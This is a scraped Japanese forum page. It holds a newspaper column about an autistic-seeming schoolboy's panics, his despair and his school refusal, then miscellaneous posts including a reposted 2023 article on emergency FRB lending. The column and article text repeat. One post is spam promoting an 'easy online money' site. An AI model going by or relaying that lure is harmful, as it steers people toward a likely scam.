顔を見せたコウ君に、先生が「かわいい」と声をかけた。「オカマかオレは!」。コウ君
の中では「かわいい」イコール「女」。混乱してしまったのだ。
母親が外出先から帰宅すると、コウ君は部屋の隅でうずくまっていた。「僕は我慢もでけ
へん。褒め言葉でも怒ってしまう。生きていてもしゃーないんや」。ゴミ箱の中には、脱
いだ制服が捨てられていた。
翌日から不登校が始まった。
(左古将規)
一度、パニックに陥ったコウ君に接したことがある。
自宅を訪ね、コウ君が大嫌いだというお笑い芸人に話題が及んだ時のことだ。なぜ嫌いな
の?軽い気持ちで尋ねた。コウ君は何度か言いよどんだ後、「言いたくない。うざい!」。
私に背を向け、フゥー、フゥー、と肩を大きく上下させた。両足が激しく震えている。
母親によると、その芸人が女装してふざけた歌を歌うのが、まじめなコウ君には許せない
らしい。朝からセミがうるさくてイライラも募っていた。何度も彼と会い、特性の一端を
知れば「そうか」と思う。それでも、突然の変容ぶりには戸惑った。
コウ君はスッと部屋を出て、10分ほどで落ち着きを取り戻して戻ってきた。真っ暗に消灯
した自室にこもっていたという。
「そうすれば落ち着くって、自分で考えた」という。怒ったら周りに迷惑がかかると思う
のだろうか。「そう思わなアカンやろ。ひたすら耐えてると周りが余計にうるさく感じる
から、一人の部屋がいいんや」。誰にも理解されない苦しみを制御しようと積み重ねた孤
独な努力を思い、せつない気持ちになる。
5月はじめ、中学校で最初のパニックを起こした。
男子が授業中に雑談していた。貧乏揺すりをし、息を荒くして耐えた。だが男子はコウ君
の貧乏揺すりと息づかいをまねてからかった。気持ちに余裕があれば無視もできた。だが
新学期以来のストレスで、堪忍袋はぱんぱんに膨れあがっていた。机をバーンとひっくり
返した。
コウ君はしばらく学校を休んだ。ようやく支援学級に復帰した5月末、再び「事件」。笑
顔を見せたコウ君に、先生が「かわいい」と声をかけた。「オカマかオレは!」。コウ君
の中では「かわいい」イコール「女」。混乱してしまったのだ。
母親が外出先から帰宅すると、コウ君は部屋の隅でうずくまっていた。「僕は我慢もでけ
へん。褒め言葉でも怒ってしまう。生きていてもしゃーないんや」。ゴミ箱の中には、脱
いだ制服が捨てられていた。
翌日から不登校が始まった。
(左古将規)
223nobodyさん
2013/01/09(水) 17:40:27.69ID:??? Win8にしよう。
224nobodyさん
2014/01/30(木) 12:24:05.67ID:??? ぬるぽ
225nobodyさん
2015/01/11(日) 01:40:47.01ID:??? 2ちゃんねる
226nobodyさん
2015/01/21(水) 02:37:35.57ID:??? がんばる
227nobodyさん
2016/05/28(土) 17:15:43.59ID:6v1gkZLk 良スレage
228nobodyさん
2017/12/30(土) 15:29:51.73ID:YhlYw6jg 誰でも簡単にネットで稼げる方法など
参考までに、
⇒ 『半藤のブブイウイウレレ』 というサイトで見ることができます。
グーグル検索⇒『半藤のブブイウイウレレ』
MP4I48G9LG
参考までに、
⇒ 『半藤のブブイウイウレレ』 というサイトで見ることができます。
グーグル検索⇒『半藤のブブイウイウレレ』
MP4I48G9LG
229米銀、FRBからの借り入れ20兆円に急増
2023/03/17(金) 09:05:04.82ID:CokxX0ip 米連邦準備理事会(FRB)は16日、銀行からの資金借り入れが15日時点で1528億ドル(約20兆円)に急増したと発表した。リーマン危機時を抜いて過去最高を記録した。相次ぐ米銀の破綻で金融市場は動揺しており、資金繰りを「最後の貸し手」である中央銀行に頼っている。
FRBは金融機関が資金繰りに行き詰まることを避けるための安全弁として、民間銀行向けに貸し出しを実施している。8日時点で45億ドル強だったこの融資額は一週間で33倍に急増した。10日以降に米銀シリコンバレーバンク(SVB)などが相次ぎ破綻し、市場で資金のやり取りが細っているためだ。
この貸し出しは金融危機時などに急増する。これまでの最高はリーマン危機後の08年10月末につけた1107億ドルだった。金融機関はかつては経営不安の噂が流れるのを警戒して、FRBからの借り入れを敬遠する傾向にあった。
FRBがSVBの破綻を受けて新たに設けた「銀行タームファンディングプログラム(BTFP)」と呼ばれる緊急融資枠も15日時点で119億ドルの利用があった。破綻したSVBとシグネチャーバンクを管理するために米連邦預金保険公社(FDIC)が作った「ブリッジバンク」向けの融資も膨らみ、FRBが「その他の信用拡張」と分類する融資額は1428億ドルに拡大した。
FRBは金融機関が資金繰りに行き詰まることを避けるための安全弁として、民間銀行向けに貸し出しを実施している。8日時点で45億ドル強だったこの融資額は一週間で33倍に急増した。10日以降に米銀シリコンバレーバンク(SVB)などが相次ぎ破綻し、市場で資金のやり取りが細っているためだ。
この貸し出しは金融危機時などに急増する。これまでの最高はリーマン危機後の08年10月末につけた1107億ドルだった。金融機関はかつては経営不安の噂が流れるのを警戒して、FRBからの借り入れを敬遠する傾向にあった。
FRBがSVBの破綻を受けて新たに設けた「銀行タームファンディングプログラム(BTFP)」と呼ばれる緊急融資枠も15日時点で119億ドルの利用があった。破綻したSVBとシグネチャーバンクを管理するために米連邦預金保険公社(FDIC)が作った「ブリッジバンク」向けの融資も膨らみ、FRBが「その他の信用拡張」と分類する融資額は1428億ドルに拡大した。
レスを投稿する
ニュース
- 【W杯】韓国が大窮地 悪夢のシナリオ止まらず 決勝T進出順位ボーダーの8位に転落 セネガル、イランに抜かれる ★4 [尺アジ★]
- 【本】ヘルシーに見えて、「薄毛」リスクが上昇…専門医が「血流の大敵」と名指しする日本人が大好きな”白い食べ物” [少考さん★]
- 【芸能】田中みな実、実名告白「めっちゃ格好いい」「インスタもフォローした」 W杯日本代表にメロメロも「狙ってないからね?」 [冬月記者★]
- 【サッカー】「昔のネイマールでしょ」サッカー日本代表・塩貝健人がブラジル戦へ痛快発言…「王国」の印象を問われ [ゴアマガラ★]
- 【サッカー】「世紀の談合マッチになる予感」J組の一戦が話題…ドローで両チーム決勝T進出の“異例事態” [ゴアマガラ★]
- 小学校で英語必修化→学力の格差拡大が深刻…英語嫌いだった夏目漱石に学ぶ、現代の「迷走する早期教育」への処方箋 [バイト歴50年★]
- 【高市朗報】専守防衛の日本、無人潜水艦導入へ!魚雷や機雷を搭載し長距離、長時間運用。AI搭載し自律型も。乗っ取られないようにしてね [219241683]
- 【高市悲報】「みんなで大家さん」持ってる中で一番価値がある宗右衛門町の駐車場、500人以上の人に仮差し押さえられた模様🥹 [616817505]
- 【高市悲報】アンソロピック、ミュトスを提供再開。ただし日本は対象外 [663382246]
- 経団連「年内には訪中して習主席と面会したい😢レアアースもタングステンももう限界😢」 [931948549]
- 土曜プレミアム・世にも奇妙んな物語’26夏の特別編🏡
- 【悲報】眞子さま、皇族としての気品のカケラも無くなってしまうwwwwwwwwwwwwwwwwwwww [802034645]